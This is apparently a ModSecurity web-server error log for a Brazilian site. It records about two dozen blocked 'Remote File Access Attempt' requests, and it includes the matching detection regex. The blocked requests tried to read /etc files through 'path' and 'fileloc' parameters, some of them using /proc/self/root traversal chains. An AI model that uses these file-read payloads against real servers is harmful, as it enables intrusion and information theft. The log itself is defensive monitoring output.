[Fri Mar 20 08:59:57.018967 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:39428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02vda6ubjKNq_cu4biBQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:57.323034 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.9:36868] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vRCii7xarUs8iHZzDQAAAhU"]
[Fri Mar 20 08:59:57.555143 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.119:36892] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vRCii7xarUs8iHZzDwAAAg0"]
[Fri Mar 20 08:59:58.047000 2026] [:error] [pid 31215:tid 140411666392832] [client 57.141.18.13:36916] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vgF0L0L-SsrnPo50ZwAAAsk"]
[Fri Mar 20 08:59:58.221075 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.9:36928] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vvXLqtnMIWvjpaKmOwAAApg"]
[Fri Mar 20 08:59:58.366640 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.48:36930] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vjJ3M9BSuKP7CAYqoQAAAIY"]
[Fri Mar 20 08:59:58.663940 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.96:36952] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vhCii7xarUs8iHZzEgAAAgo"]
[Fri Mar 20 08:59:59.189138 2026] [:error] [pid 31215:tid 140411624429312] [client 57.141.18.25:36976] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vwF0L0L-SsrnPo50aQAAAs4"]
[Fri Mar 20 08:59:59.728637 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.33:37002] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02v_qxLDW4GITHUkT1DAAAARI"]
[Fri Mar 20 09:00:02.042851 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.123:37020] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wF1pVZ5mVmJwsFM9TwAAAFY"]
[Fri Mar 20 09:00:02.051665 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.243.128:39434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02wbninkcc-iUj5ApppQAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:00:02.124575 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.97:37036] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wfqxLDW4GITHUkT1DQAAAQo"]
[Fri Mar 20 09:00:02.183128 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.3:37032] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wQF0L0L-SsrnPo50awAAAss"]
[Fri Mar 20 09:00:02.242547 2026] [:error] [pid 9818:tid 140411540502272] [client 57.141.18.95:37028] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wV1pVZ5mVmJwsFM9UQAAAFg"]
[Fri Mar 20 09:00:02.247075 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.48:37022] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wPHIg5MgXLBnicMCggAAAcE"]
[Fri Mar 20 09:00:02.299911 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.49:37040] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wuoXxyEfFpUF8f-MJAAAAVA"]
[Fri Mar 20 09:00:02.398471 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.3:37014] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02v-oXxyEfFpUF8f-MIwAAAUw"]
[Fri Mar 20 09:00:02.585323 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.77:37056] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wl1pVZ5mVmJwsFM9UwAAAFc"]
[Fri Mar 20 09:00:02.997657 2026] [:error] [pid 11167:tid 140411641214720] [client 57.141.18.29:37062] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wvHIg5MgXLBnicMChAAAAcw"]
[Fri Mar 20 09:00:03.419795 2026] [:error] [pid 31215:tid 140411641214720] [client 57.141.18.88:37074] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02wwF0L0L-SsrnPo50bAAAAsw"]
[Fri Mar 20 09:00:03.545953 2026] [:error] [pid 21219:tid 140411691570944] [client 57.141.18.44:37076] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02w_XLqtnMIWvjpaKmPgAAAoY"]
[Fri Mar 20 09:00:04.235754 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.77:37084] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02xPXLqtnMIWvjpaKmPwAAApA"]
[Fri Mar 20 09:00:04.746130 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.68:37088] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02xOoXxyEfFpUF8f-MJQAAAUQ"]
[Fri Mar 20 09:00:04.931635 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.17:37090] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02xPXLqtnMIWvjpaKmQAAAAo8"]
[Fri Mar 20 09:00:05.248372 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.98:37092] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02xV1pVZ5mVmJwsFM9VAAAAEY"]
[Fri Mar 20 09:00:06.026451 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.15:37096] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02xta6ubjKNq_cu4biCwAAA0M"]
[Fri Mar 20 09:00:06.108839 2026] [:error] [pid 11642:tid 140411557287680] [client 57.141.18.95:37102] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02xrninkcc-iUj5ApppgAAA5Y"]
[Fri Mar 20 09:00:06.608612 2026] [:error] [pid 11167:tid 140411548894976] [client 57.141.18.42:37110] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02xvHIg5MgXLBnicMChQAAAdc"]
